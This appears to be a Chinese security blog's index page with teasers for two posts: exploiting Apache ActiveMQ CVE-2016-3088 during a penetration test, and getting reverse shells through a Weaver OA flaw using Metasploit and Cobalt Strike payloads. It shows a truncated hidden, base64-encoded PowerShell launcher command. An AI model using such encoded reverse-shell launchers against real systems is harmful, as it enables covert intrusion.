谋生

ActiveMQ漏洞(CVE-2016-3088)利用

  • by

背景

又是一次工作渗透,又一次遇到了ActiveMQ,不过这回的版本为5.9.0,存在已知漏洞。

参考知道创宇Paper文章,直接开始记录利用过程。

漏洞信息

2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。

阅读更多 »ActiveMQ漏洞(CVE-2016-3088)利用

msf powershell base64 command

  • by

试着用泛微OA爆出来不久的漏洞反弹SHELL,通过网上公开的POC只能执行whomai之类的简单命令,复杂一些的会报错。直到后来发现可以使用Cobalt Strike生成的powershell反弹。

Cobalt Strike可以,那Metasploit可以吗?

Cobalt Strike 生成的Payload是这样的,一段被Base64编码的内容。

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAa......

而Msfvenom没有合适的encoder可以将powershell Payload进行Base64编码。

通过搜索得到一个这样的编码脚本,能够将Msfvenom生成的Payload像上面那样编码。

阅读更多 »msf powershell base64 command